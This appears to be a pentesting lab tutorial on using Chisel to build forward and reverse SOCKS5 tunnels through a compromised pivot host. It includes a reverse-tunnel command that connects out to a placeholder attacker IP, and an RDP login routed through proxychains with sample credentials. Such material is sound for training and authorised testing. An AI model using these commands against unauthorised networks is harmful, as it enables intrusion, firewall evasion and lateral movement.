SOCKS5 Tunneling with Chisel

Chisel is a TCP/UDP-based tunneling tool written in Go that uses HTTP to transport data secured with SSH. It can create client-server tunnel connections in firewall-restricted environments.

How It Works

Chisel creates an HTTP-based tunnel secured with SSH between a client and server. When using SOCKS5 mode, the server listens on a port and forwards traffic to all networks accessible from the pivot host. The client connects and opens a local SOCKS5 proxy (default port 1080) that routes traffic through the tunnel.

This is useful when the attack host and target network are on different segments, but a compromised pivot host has access to both.

Setup

Building Chisel

git clone https://github.com/jpillora/chisel.git
cd chisel
go build

Note: glibc version mismatches between target and workstation can cause errors. Use a prebuilt binary from the Releases page if needed.

Transfer the binary to the pivot host:

scp chisel ubuntu@<PIVOT_IP>:~/

Forward Pivot

Run the server on the pivot host, client on the attack host. Use this when inbound connections to the pivot host are allowed.

Server (Pivot Host)

./chisel server -v -p 1234 --socks5

Client (Attack Host)

./chisel client -v <PIVOT_IP>:1234 socks

The client starts a local SOCKS5 proxy on 127.0.0.1:1080.

Reverse Pivot

Run the server on the attack host, client on the pivot host. Use this when firewall rules restrict inbound connections to the pivot host.

Server (Attack Host)

sudo ./chisel server --reverse -v -p 1234 --socks5

Client (Pivot Host)

./chisel client -v <ATTACKER_IP>:1234 R:socks

The R:socks remote listens on the server’s default SOCKS5 port (1080) and terminates at the client’s internal proxy.

Using the Tunnel with Proxychains

Edit /etc/proxychains.conf:

[ProxyList]
socks5 127.0.0.1 1080

Then route tools through the tunnel:

proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123